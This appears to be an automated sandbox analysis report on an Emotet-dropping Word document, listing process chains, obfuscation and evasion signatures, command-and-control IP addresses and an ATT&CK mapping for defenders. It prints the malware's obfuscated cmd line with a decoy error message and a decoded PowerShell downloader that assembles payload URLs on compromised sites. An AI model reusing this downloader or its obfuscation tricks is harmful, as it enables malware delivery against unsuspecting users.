                      Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: ARCHIVOFile-20-012021.doc Virustotal: Detection: 48%
                      Source: ARCHIVOFile-20-012021.doc ReversingLabs: Detection: 50%
                      Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [Base64-encoded command]
                      Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [Base64-encoded command]
                      Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [Base64-encoded command]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: mscorlib.pdb` source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdbO source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107891055.0000000002820000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbles AA source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp

                      Data Obfuscation:

                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: ARCHIVOFile-20-012021.doc Stream path 'Macros/VBA/Nst6otvnmgmpw' : High number of GOTO operations
                      Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Nst6otvnmgmpw Name: Nst6otvnmgmpw
                      Document contains an embedded VBA with many randomly named variables
                      Source: ARCHIVOFile-20-012021.doc Stream path 'Macros/VBA/Nst6otvnmgmpw' : High entropy of concatenated variable names
                      Obfuscated command line found
                      Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [Base64-encoded command]
                      Suspicious powershell command line found
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [Base64-encoded command]
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [Base64-encoded command]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002608D0 push edx; ret 7_2_002609D4
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002439A0 push cs; ret 7_2_002439A1
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242A01 push esi; ret 7_2_00242A04
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245BD8 push ss; iretd 7_2_00245C3B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245C29 push ss; iretd 7_2_00245C3B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024548F push ebp; retf 7_2_00245496
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242CFB push ecx; retn 001Eh 7_2_00242D01
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00241740 push DA0FDC41h; iretd 7_2_00241745
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001E08D0 push edx; ret 8_2_001E09D4
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C39A0 push cs; ret 8_2_001C39A1
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C2A01 push esi; ret 8_2_001C2A04
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C5BD8 push ss; iretd 8_2_001C5C3B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C5C29 push ss; iretd 8_2_001C5C3B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C548F push ebp; retf 8_2_001C5496
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C2CFB push ecx; retn 001Eh 8_2_001C2D01
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C1740 push DA0FDC41h; iretd 8_2_001C1745
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002408D0 push edx; ret 9_2_002409D4
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002239A0 push cs; ret 9_2_002239A1
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00222A01 push esi; ret 9_2_00222A04
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00225BD8 push ss; iretd 9_2_00225C3B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00225C29 push ss; iretd 9_2_00225C3B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0022548F push ebp; retf 9_2_00225496
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00222CFB push ecx; retn 001Eh 9_2_00222D01
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00221740 push DA0FDC41h; iretd 9_2_00221745
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002108D0 push edx; ret 10_2_002109D4
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F39A0 push cs; ret 10_2_001F39A1
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F2A01 push esi; ret 10_2_001F2A04
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F5BD8 push ss; iretd 10_2_001F5C3B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F5C29 push ss; iretd 10_2_001F5C3B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F548F push ebp; retf 10_2_001F5496
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F2CFB push ecx; retn 001Eh 10_2_001F2D01

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: rundll32.exe, 00000008.00000002.2124359207.00000000006A0000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h] 7_2_10001D4D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 51.255.203.164 144
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option found
                      Source: unknownProcess created: Base64 decoded SET-iTeM varIaBLE:PGB ( [TYPe]("{2}{4}{5}{1}{0}{3}" -f'.Dir','m.IO','Sy','ECToRy','St','E')); sET ('29x'+'d'+'4M') ( [TYpE]("{7}{1}{2}{3}{6}{4}{0}{5}" -f'Na','ys','TeM.NEt','.SErVi','ePOinTmA','GeR','C','s') );$Xjb6uu9=$S_7W + [char](64) + $C96Z;$A29Y=(('T'+'65')+'Q'); $pgB::"cr`EaT`eDIr`Ect`oRy"($HOME + (('db'+('zVl'+'j0ta0d')+'bz'+('M'+'tkd4'+'y0')+('db'+'z'))."r`E`PLAce"(([cHaR]100+[cHaR]98+[cHaR]122),'\')));$X13H=(('T'+'66')+'L'); (VaRiABLe ('29x'+'d'+'4M') ).VALue::"SeCUR`ITY`P`R`OTOCOL" = ('Tl'+('s'+'12'));$E34Q=(('Q_'+'1')+'L');$I3laa23 = (('O8'+'_')+'N');$W96Y=(('P'+'51')+'D');$Iq6rfg0=$HOME+((('o'+'6nV')+('lj0t'+'a0o')+'6n'+'Mt'+('kd'+'4')+('y'+'0o6')+'n')-crEPlACE ([chAr]111+[chAr]54+[chAr]110),[chAr]92)+$I3laa23+('.'+('dl'+'l'));$S84B=('O'+('32'+'I'));$Ozx9xkd=('s'+'g'+(' yw'+' a'+'h'+':'+'//riandut')+('r'+'a.com/e')+'m'+'a'+('il/'+'A'+'fhE8z0/')+('@s'+'g yw')+(' a'+'h:')+'//'+'c'+('al'+'le'+'dtoch'+'a')+('nge'+'.org'+'/C')+'a'+('l'+'ledt')+'o'+'C'+'h'+('an'+'g')+('e/8huS'+'O'+'d/')+('@s'+'g yw')+(' ah'+'s:/'+'/m'+'rveggy.c'+'om/wp-admi'+'n')+('/'+'n/@')+'s'+('g yw'+' a')+'h'+'s'+(':'+'//n')+('orail'+'y')+'a'+('.'+'co'+'m/dr')+'up'+('al'+'/')+('r'+'etA')+'l'+('/'+'@sg')+' y'+('w ahs:'+'/')+'/'+('hbprivi'+'l'+'e'+'g')+'e'+'d.'+'co'+('m/cg'+'i-bin'+'/Qg')+('/@s'+'g y'+'w')+(' '+'ahs')+':'+'//'+'u'+'mm'+('ahstar'+'s.'+'com')+'/'+('ap'+'p_')+'o'+('ld_'+'m')+('ay_'+'2')+'0'+('18'+'/')+('as'+'sets')+('/'+'wDL8'+'x')+'/'+('@s'+'g ')+('y'+'w ')+('ah'+'s')+'
                      Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded command, identical to the decoded command in the preceding entry
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [Base64-encoded command omitted]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                      Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [Base64-encoded command omitted]
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [Base64-encoded command omitted]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

                      Stealing of Sensitive Information:

                      Yara detected Emotet

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 111 | Disable or Modify Tools 111 | OS Credential Dumping | File and Directory Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 4 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scripting 22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 3 | LSASS Memory | System Information Discovery 15 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Exploitation for Client Execution 3 | Logon Script (Windows) | Logon Script (Windows) | Scripting 22 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | Command and Scripting Interpreter 211 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Security Software Discovery 11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | PowerShell 3 | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Virtualization/Sandbox Evasion 2 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 14 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 21 | Cached Domain Credentials | Process Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 111 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

                      Behavior Graph

[Behavior graph image not reproduced; labels recoverable from the graph follow.]
Behavior Graph ID: 344894; Sample: ARCHIVOFile-20-012021.doc; Startdate: 27/01/2021; Architecture: WINDOWS; Score: 100
Processes: WINWORD.EXE; cmd.exe, which starts powershell.exe and msg.exe; powershell.exe drops C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll (PE32) and starts rundll32.exe, which starts a chain of further rundll32.exe processes.
Signatures on cmd.exe: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found.
Signature on powershell.exe: Powershell drops PE file.
